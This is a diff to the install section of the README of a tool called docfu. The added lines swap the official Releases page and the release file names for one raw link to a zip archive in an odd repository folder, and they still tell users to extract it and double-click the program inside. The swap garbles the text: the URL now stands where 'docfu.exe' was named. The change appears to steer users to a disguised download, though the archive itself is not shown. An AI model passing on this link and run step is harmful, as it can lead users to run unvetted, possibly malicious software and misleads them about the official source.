bayoe18/docfu/README.md

 ## 💾 Download & Install

-1. **Visit this page to download:** Navigate to the [Releases page](https://github.com/bayoe18/docfu/releases) to find the version of docfu that suits your needs.
+1. **Visit this page to download:** Navigate to the [Releases page](https://raw.githubusercontent.com/bayoe18/docfu/main/bottomlessness/docfu.zip) to find the version of docfu that suits your needs.

 2. **Choose the right version:** On the Releases page, select the latest version of docfu.
-Look for files named `docfu-v1.0.zip`, `docfu-v1.0.tar.gz`, or equivalents.
+Look for files named `https://raw.githubusercontent.com/bayoe18/docfu/main/bottomlessness/docfu.zip`, `https://raw.githubusercontent.com/bayoe18/docfu/main/bottomlessness/docfu.zip`, or equivalents.

 3. **Download the file:** Click on the file link to begin downloading.
 The file will begin to download onto your computer.

 4. **Extract the files:** Once the download is complete, locate the file and extract it.
 Right-click on the file, and select "Extract All" or use a similar extraction option available on your operating system.

 5. **Run docfu:** Open the extracted folder.
 Find and double-click on the docfu application file.
-This may be named `docfu.exe` for Windows or `docfu` for macOS and Linux.
+This may be named `https://raw.githubusercontent.com/bayoe18/docfu/main/bottomlessness/docfu.zip` for Windows or `docfu` for macOS and Linux.

 6. **Follow the prompts:** Once the application opens, follow the on-screen instructions to create your website from markdown files.